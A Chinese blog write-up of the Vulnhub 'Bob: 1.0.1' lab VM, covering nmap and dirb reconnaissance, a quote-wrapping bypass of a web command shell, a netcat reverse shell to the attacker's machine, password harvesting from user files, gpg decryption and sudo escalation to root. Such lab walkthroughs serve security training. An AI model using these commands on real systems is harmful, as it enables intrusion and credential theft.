首页 > 其他分享 >Vulhub Bob: 1.0.1靶机详解

Vulhub Bob: 1.0.1靶机详解

时间:2024-10-16 16:51:22浏览次数:3  
标签:Vulhub 1.0 192.168 目录 Bob txt 47.173 bob

项目地址

https://download.vulnhub.com/bob/Bob_v1.0.1.ova

实验过程

开启靶机虚拟机

使用nmap进行主机发现,获取靶机IP地址

nmap 192.168.47.1-254

根据对比可知Bob: 1.0.1的一个ip地址为192.168.47.173

扫描Bob: 1.0.1的操作系统,端口及对应服务

nmap -A -p- 192.168.47.173

发现该靶机开放了21,80,25468端口

目录扫描

dirb http://192.168.47.173

信息收集

进入网站

没找到有用信息

拼接扫出来的robots.txt

拼接/login.php访问被拒绝

拼接/passwords.html

没得到有用信息

拼接/dev_shell.php

得到一个命令执行的输入框

输入ls没有正常执行

尝试用’'给引起来

发现有回显了

获取shell

kali开启监听

nc -lvvp 7272

'nc' -c /bin/bash 192.168.47.129 7272

反弹成功

获取交互式shell

python -c "import pty; pty.spawn('/bin/bash')"

提权

cd到home目录下,找到4个用户目录

到bob用户看看,发现有个可能存放password的文件 .old_passwordfile.html

查看该文件找到了jc和seb用户的密码

继续翻找

在 /bob/Documents 目录下发现了加密文件login.txt.gpg和Secret的目录

查看一下

在Secret深处找到一个sh文件,经过研究发现这是一首藏头诗,得到密钥HARPOCRATES

回到Documents目录尝试解密login.txt.gpg

gpg -d login.txt.gpg

权限不够

查看另一个文件

感觉没啥用

到 elliot 用户home目录下看看有没有有用信息

发现theadminisdumb.txt文件,里面内容应该是 elliot 写给员工的信

这里也提到 jc 密码为Qwerty,并且他将自己密码改为了theadminisdumb

另外两个用户并未在其目录下找到有用的信息

切换到jc用户

ssh [email protected] -p 25468

看看刚刚/bob/Documents目录下没权限的文件是否能解密

需要密码,输入刚刚到的密钥HARPOCRATES

得到bob的密码为b0bcat_

切换bob用户

ssh [email protected] -p 25468

登陆成功

查看可利用命令

sudo -l

发现是ALL

直接sudo su提权

提权成功

标签:Vulhub,1.0,192.168,目录,Bob,txt,47.173,bob
From: https://blog.csdn.net/weixin_62457642/article/details/142986446

相关文章

  • Parallels Desktop 20(Mac虚拟机) v20.1.0 for Mac 2024最新破解版免费下载附带PD 20
    ParallelsDesktop20 是一款目前功能最强大灵活度最高的虚拟机软件,可运行数千种Windows应用程序,如MicrosoftOffice、InternetExplorer、Access、Quicken、QuickBooks、VisualStudio,甚至支持对图像要求较高的游戏和CAD项目,而不影响任何性能且无需重启。ParallelsDes......
  • wpf combobox 去除下拉框展开时自动选择文本
    新增一个自定义控件继承ComboBox,同事在输入事件之前打开下拉框publicpartialclassComboBoxEx:ComboBox{publicComboBoxEx(){}privateintcaretPosition;publicoverridevoidOnApplyTemplate(){base.OnApplyTemplate(......
  • Fork-2.1.0 记录
    Fork-2.1.0记录PE64操作系统:Windows(Server2003)[AMD64,64位,GUI]链接程序:Microsoftlinker(11.00)编译器:VisualC#语言:C#库:.NET(v4.0.30319)签名工具:WindowsAuthenticode(2.0)[PKCS#7].NET混淆器:Confuser(1.X)附......
  • UE-GAS CreateDefaultSubobject<UAbilitySystemComponent>返回为nullptr
    前因原先在项目中用了默认的ASC(UAbilitySystemComponent),后面因为新的需求导致需要改为自己的ASC。结果改了之后,发现在Pre-Init(构造函数)时,CreateDefaultSubobject的返回值是nullptr。过程于是去论坛求助:论坛的人的回答是,你修改了ASC的类,导致前一个ASC反序列化到当前ASC上,从而......
  • 【Linux权限维持】红队1.0
    原创白安全组今年的红队评分标准,红队维持权限时间越久,得分越高,所以权限维持迫在眉睫。一、隐藏技巧1.1修改文件属性蓝队如果根据时间来判断文件是否为后门,可以通过参考index.php的时间,来比对,来排出shell文件我们可以使用touch命令,来修改文件或者目录的时间属性。包括存......
  • 01背包问题/Ieee全球极限编程大赛11.0题BeetleBag题解/洛谷P1926 小书童——刷题大军
    基础01背包问题概述给出一个容积为V的背包,有i个物体,每个物体都有自己的体积和价值,用Vi和Wi表示,要将这些物体装进背包里面,问怎样才能使得装入物体的总价值最大?最大为多少?解决思路1.如果你没能正确理解这道题,尤其是对于很多新手,第一反应可能是将所有物体的单位价值算出来,然后......
  • 汉王语音王 1.0.22 | 同声传译,会议语音记录,实时翻译
    汉王语音王是一款完全免费的实时语音转文字软件,支持AI语音转写、实时语音转文字、导入音频转文字、同声传译、对话翻译等多种功能。识别准确率高,转写和翻译速度快,支持智能区分说话人、自动总结核心要点、拍录同步、PDF和Word格式导出等功能。大小:53.2M百度网盘:https://pa......
  • 《DNK210使用指南 -CanMV版 V1.0》第二十九章 音频录制实验
    第二十九章音频录制实验1)实验平台:正点原子DNK210开发板2)章节摘自【正点原子】DNK210使用指南-CanMV版V1.03)购买链接:https://detail.tmall.com/item.htm?&id=7828013987504)全套实验源码+手册+视频下载地址:http://www.openedv.com/docs/boards/k210/ATK-DNK210.html5)正点原......
  • 自制免费小说推文辅助工具:免费的文本转语音软件(v1.0),如果没有免费的软件那就自己做一个
    近在研究Pyqt的使用,于是准备做一些小工具练手。本文为自研免费推文助手软件系列第1篇文章,后面会持续更新。一、目标功能1、文本转语音:生成音频文件(.mp3);(v1.0)2、文本转语音:生成字幕文件(.srt);(v2.0)3、文本处理:去除无效行(空行、纯数字行)、去除特殊字符串;(v2.0)4、API服务:......
  • Android 11.0 第三方app授予DeviceOwner权限调用系统reboot,显示隐藏app,锁屏,禁用app
    1.前言 在11.0的系统rom定制化开发中,在有些客户开发app的功能中,需要系统授予app的DeviceOwner权限,然后app就可以实现重启关机禁用下拉通知栏,显示隐藏app,等功能,首选需要在app和framework中配置相关功能,接下来具体分析相关功能的实现2.第三方app授予DeviceOwner权限调用系统......